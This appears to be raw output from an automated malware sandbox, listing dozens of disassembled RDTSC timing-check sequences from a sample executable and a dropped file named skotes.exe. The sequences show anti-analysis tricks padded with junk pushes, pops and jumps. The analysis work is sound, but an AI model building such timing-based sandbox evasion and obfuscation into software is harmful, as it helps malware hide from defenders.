Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF0A01 second address: 4CF0A2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 jmp 00007FB19901BDDDh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+14h] 0x00000011 jmp 00007FB19901BDDEh 0x00000016 push dword ptr [ebp+10h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D00AB7 second address: 4D00ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D80085 second address: 4D800C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, F99Dh 0x00000007 mov edi, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov si, FBD1h 0x00000012 pushfd 0x00000013 jmp 00007FB19901BDDEh 0x00000018 jmp 00007FB19901BDE5h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D800C5 second address: 4D800C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D800C9 second address: 4D800CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D800CF second address: 4D800D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D800D5 second address: 4D800D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D800D9 second address: 4D800DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D800DD second address: 4D8011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB19901BDE5h 0x00000012 add ax, 7BA6h 0x00000017 jmp 00007FB19901BDE1h 0x0000001c popfd 0x0000001d movzx eax, di 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D703DA second address: 4D703F8 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB19901BD13h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D703F8 second address: 4D703FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D703FE second address: 4D70426 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB19901BD14h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D7027C second address: 4D70280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70280 second address: 4D70286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70286 second address: 4D702D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FB19901BDDDh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov di, ax 0x00000017 pushfd 0x00000018 jmp 00007FB19901BDE8h 0x0000001d sbb ch, FFFFFFC8h 0x00000020 jmp 00007FB19901BDDBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D702D5 second address: 4D702D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D702D9 second address: 4D702DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D702DF second address: 4D702E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D1001F second address: 4D10025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10025 second address: 4D1002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D1002B second address: 4D1005B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB19901BDDFh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB19901BDE5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70639 second address: 4D70643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 56954DACh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70643 second address: 4D706BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 mov dl, E2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB19901BDE5h 0x00000012 and ax, BE36h 0x00000017 jmp 00007FB19901BDE1h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FB19901BDE0h 0x00000023 and esi, 40AB9D58h 0x00000029 jmp 00007FB19901BDDBh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 jmp 00007FB19901BDE6h 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706BF second address: 4D706C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706C3 second address: 4D706E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706E0 second address: 4D706E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706E6 second address: 4D706EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706EA second address: 4D706EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D706EE second address: 4D70745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c push edx 0x0000000d mov dx, ax 0x00000010 pop esi 0x00000011 pushfd 0x00000012 jmp 00007FB19901BDDDh 0x00000017 adc si, 23B6h 0x0000001c jmp 00007FB19901BDE1h 0x00000021 popfd 0x00000022 popad 0x00000023 push dword ptr [ebp+08h] 0x00000026 jmp 00007FB19901BDDEh 0x0000002b call 00007FB19901BDD9h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70745 second address: 4D70749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70749 second address: 4D7074F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D7074F second address: 4D707D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB19901BD12h 0x00000008 pop ecx 0x00000009 call 00007FB19901BD0Bh 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007FB19901BD16h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d movsx ebx, si 0x00000020 pushfd 0x00000021 jmp 00007FB19901BD0Ah 0x00000026 or esi, 07E1AAC8h 0x0000002c jmp 00007FB19901BD0Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [eax] 0x00000035 jmp 00007FB19901BD19h 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D707D6 second address: 4D707DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D707DA second address: 4D707E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D7086F second address: 4D70873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D70873 second address: 4D70879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D205C9 second address: 4D2060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB19901BDE9h 0x00000009 sbb ax, 3C66h 0x0000000e jmp 00007FB19901BDE1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov di, cx 0x00000020 mov esi, 09470FA1h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2060F second address: 4D20614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20614 second address: 4D20629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, E79Eh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 push eax 0x00000012 push edx 0x00000013 mov esi, edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20629 second address: 4D20681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push FFFFFFFEh 0x00000009 jmp 00007FB19901BD15h 0x0000000e push 35374227h 0x00000013 jmp 00007FB19901BD17h 0x00000018 add dword ptr [esp], 420A7DF1h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB19901BD15h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20681 second address: 4D206BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 49D0ADB1h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007FB19901BDE8h 0x00000016 pop ecx 0x00000017 mov esi, edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D206BA second address: 4D206BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D206BF second address: 4D20719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB19901BDE8h 0x0000000a or ax, 5B18h 0x0000000f jmp 00007FB19901BDDBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xor dword ptr [esp], 3EE803B1h 0x0000001f jmp 00007FB19901BDE6h 0x00000024 mov eax, dword ptr fs:[00000000h] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20719 second address: 4D2071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2071D second address: 4D20723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20723 second address: 4D20746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ch 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB19901BD15h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20746 second address: 4D207DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB19901BDE7h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FB19901BDE9h 0x0000000f and ax, 88D6h 0x00000014 jmp 00007FB19901BDE1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], eax 0x00000020 jmp 00007FB19901BDDEh 0x00000025 sub esp, 1Ch 0x00000028 jmp 00007FB19901BDE0h 0x0000002d xchg eax, ebx 0x0000002e jmp 00007FB19901BDE0h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB19901BDDDh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D207DC second address: 4D207F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D207F1 second address: 4D20834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov cx, 8183h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007FB19901BDE6h 0x00000017 and ah, 00000048h 0x0000001a jmp 00007FB19901BDDBh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20834 second address: 4D20856 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB19901BD17h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20856 second address: 4D208AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007FB19901BDDEh 0x00000011 xchg eax, edi 0x00000012 jmp 00007FB19901BDE0h 0x00000017 push eax 0x00000018 pushad 0x00000019 movsx edi, ax 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 mov eax, 7FA99D7Bh 0x00000025 popad 0x00000026 popad 0x00000027 xchg eax, edi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx edi, ax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D208AD second address: 4D20907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [7743B370h] 0x0000000e jmp 00007FB19901BD10h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 jmp 00007FB19901BD10h 0x0000001b xor eax, ebp 0x0000001d jmp 00007FB19901BD11h 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov si, dx 0x00000029 movsx ebx, ax 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20907 second address: 4D2090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2090D second address: 4D20911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20911 second address: 4D209A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB19901BDDFh 0x00000013 and eax, 1DE45D2Eh 0x00000019 jmp 00007FB19901BDE9h 0x0000001e popfd 0x0000001f mov ax, 43B7h 0x00000023 popad 0x00000024 nop 0x00000025 jmp 00007FB19901BDDAh 0x0000002a lea eax, dword ptr [ebp-10h] 0x0000002d jmp 00007FB19901BDE0h 0x00000032 mov dword ptr fs:[00000000h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ch, bl 0x0000003d call 00007FB19901BDE6h 0x00000042 pop esi 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D209A2 second address: 4D209BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D209BC second address: 4D20A41 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB19901BDE3h 0x00000008 sbb ax, 32AEh 0x0000000d jmp 00007FB19901BDE9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FB19901BDE0h 0x0000001b xor ch, 00000028h 0x0000001e jmp 00007FB19901BDDBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+10h] 0x00000028 pushad 0x00000029 call 00007FB19901BDE4h 0x0000002e mov esi, 20A24021h 0x00000033 pop ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FB19901BDDDh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20A41 second address: 4D20A71 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 542CB6F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test eax, eax 0x0000000c pushad 0x0000000d pushad 0x0000000e mov al, 13h 0x00000010 popad 0x00000011 popad 0x00000012 jne 00007FB20B63AFD7h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB19901BD16h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20A71 second address: 4D20A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BDDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20A83 second address: 4D20A9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ah, B7h 0x00000012 mov eax, edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20A9E second address: 4D20AD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB19901BDE7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20AD4 second address: 4D20AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2444F35Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [esi] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB19901BD13h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2011D second address: 4D20121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20121 second address: 4D20127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20127 second address: 4D2017A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 64B4h 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB19901BDE2h 0x00000014 sbb si, 7268h 0x00000019 jmp 00007FB19901BDDBh 0x0000001e popfd 0x0000001f mov bx, ax 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 jmp 00007FB19901BDE2h 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2017A second address: 4D2017E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2017E second address: 4D20184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: A3F3A5 second address: A3F3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BADA7D second address: BADA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BADA81 second address: BADA8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BADA8C second address: BADAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BDE4h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BADAAB second address: BADAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BADAAF second address: BADAD7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007FB19901BDE7h 0x00000012 push ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BB79E7 second address: BB79F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BB79F0 second address: BB79FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB19901BDD6h 0x0000000a popad 0x0000000b rdtsc
